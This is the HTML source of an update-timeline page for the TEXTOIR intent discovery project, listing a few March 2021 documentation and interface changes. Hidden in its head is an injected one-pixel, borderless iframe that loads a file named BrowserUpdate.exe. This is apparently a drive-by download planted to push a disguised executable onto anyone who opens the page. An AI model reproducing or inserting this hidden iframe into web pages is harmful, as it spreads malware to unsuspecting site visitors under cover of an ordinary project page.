<!DOCTYPE HTML>
<html>
    <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
        <title>New Intent Discovery System</title>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
        <meta name="description" content="" />
        <meta name="keywords" content="" />
        <link rel="stylesheet" href="/static/lib/xadmin/css/font.css">
        <link rel="stylesheet" href="/static/lib/xadmin/css/main.css" />
        <link rel="stylesheet" href="/static/lib/layui/css/layui.css" media="all">
        <script type="text/javascript" src="/static/lib/layui/layui.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/xadmin/js/xadmin.js"></script>
    </head>
    <body >
      <div class="layui-card-header"></div>
      <div class="layui-card-header" style ="align:'center'">
      <div style="font-weight:700; font-size:26px;color:#555555;text-align:center" >TEXTOIR Updates</div>
    </div><br>
    <div id="container" style="align:center;padding-left:50px">

<ul class="layui-timeline">
<li class="layui-timeline-item">
    <i class="layui-icon layui-timeline-axis"></i>
    <div class="layui-timeline-content layui-text">
      <h3 class="layui-timeline-title">2021-03-14</h3>
      <p>
        <ul>
            <p style="font-weight:540; font-size:15px;color:#555555;padding-left:0px"><img src="/static/img/updates/doc.png" width="25px"; height="25px;" style="vertical-align:middle;"/><font style="padding-left:10px">Documentation Update</font></p>
        </ul>
      </p>
    </div>
  </li>
  <li class="layui-timeline-item">
    <i class="layui-icon layui-timeline-axis"></i>
    <div class="layui-timeline-content layui-text">
      <h3 class="layui-timeline-title">2021-03-13</h3>
      <p>
      <ul>
        <p style="font-weight:540; font-size:15px;color:#555555;padding-left:0px"><img src="/static/img/updates/code.png" width="25px"; height="25px;" style="vertical-align:middle;"/><font style="padding-left:10px">Data annotation module diagram display form modification</font></p>
      </ul>
      
       </p>
    </div>
  </li>
  <li class="layui-timeline-item">
    <i class="layui-icon layui-timeline-axis"></i>
    <div class="layui-timeline-content layui-text">
      <h3 class="layui-timeline-title">2021-03-10</h3>
      <ul>
        <p style="font-weight:540; font-size:15px;color:#555555;padding-left:0px"><img src="/static/img/updates/cloth.png" width="25px"; height="25px;" style="vertical-align:middle;"/><font style="padding-left:10px">Model analysis diagram modification</font></p>
      </ul>
    </div>
  </li>
  <li class="layui-timeline-item">
    <i class="layui-icon layui-timeline-axis"></i>
    <div class="layui-timeline-content layui-text">
      <h3 class="layui-timeline-title">2021-03-07</h3>
      <p>
        <ul>
            <p style="font-weight:540; font-size:15px;color:#555555;padding-left:0px"><img src="/static/img/updates/path.png" width="25px"; height="25px;" style="vertical-align:middle;"/><font style="padding-left:10px">Project Catalog Planning</fon></p>
            <p style="font-weight:540; font-size:15px;color:#555555;padding-left:0px"><img src="/static/img/updates/bridge.png" width="25px"; height="25px;" style="vertical-align:middle;"/><font style="padding-left:10px">Define the data interaction interface</font></p>
        </ul>
      </p>
    </div>
  </li>
  <li class="layui-timeline-item">
    <i class="layui-icon layui-timeline-axis"></i>
    <div class="layui-timeline-content layui-text">
      <div class="layui-timeline-title">...</div>
    </div>
  </li>
</ul>  
<div class="copyright" style="margin-bottom:40px;text-align:center;">&copy; THUIAR 2021</div>
    </div>
        
        
        
        
        <script>layui.use(['carousel'],
            function() {
                var carousel = layui.carousel;
                //图片轮播
                carousel.render({
                    elem: '#carousel01'
                    ,width: '100%'
                    ,interval: 3000
                }); 

            });
        </script>
    </body>
</html>